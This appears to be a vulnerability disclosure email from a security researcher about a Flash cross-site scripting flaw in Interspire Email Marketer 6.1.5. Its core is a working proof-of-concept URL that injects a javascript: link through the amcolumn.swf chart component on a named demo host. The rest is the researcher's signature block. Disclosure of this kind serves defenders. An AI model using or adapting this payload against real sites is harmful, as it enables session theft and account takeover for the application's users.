# Affected software: interspire email marketer
# Type of vulnerability:flash xss
# URL:http://emailmarketer.interspire-demo.com/
# Discovered by: provensec
# Website: provensec.com

#version:  Interspire Email Marketer 6.1.5
<http://www.interspire.com/emailmarketer/>
# Proof of concept


http://emailmarketer.interspire-demo.com/admin/functions/amcharts/amcolumn/amcolumn.swf?chart_settings=%3Csettings%3E%3C/settings%3E&chart_data=%3Cchart%3E%3Cmessage%3E%3C![CDATA[%3Ca%20href=%22javascript:confirm%28%27Your%20cookies%20and%20authentication%20have%20been%20captured%20and%20an%20attacker%20now%20owns%20your%20account%20and%20all%20your%20information.%27%29%22%3EXSS%20~%20Click%20Me!%3C/a%3E]]%3E%3C/message%3E%3C/chart%3E&.swf


-- 

Best Regards,
Ankit Bharathan  /*Security Researcher*
[image: Provensec,llc] <http://provenec.com/>

ankit.b@provensec.com

Provensec,llc
http://provenec.com

P *Consider the environment. Please don't print this e-mail unless
absolutely necessary.*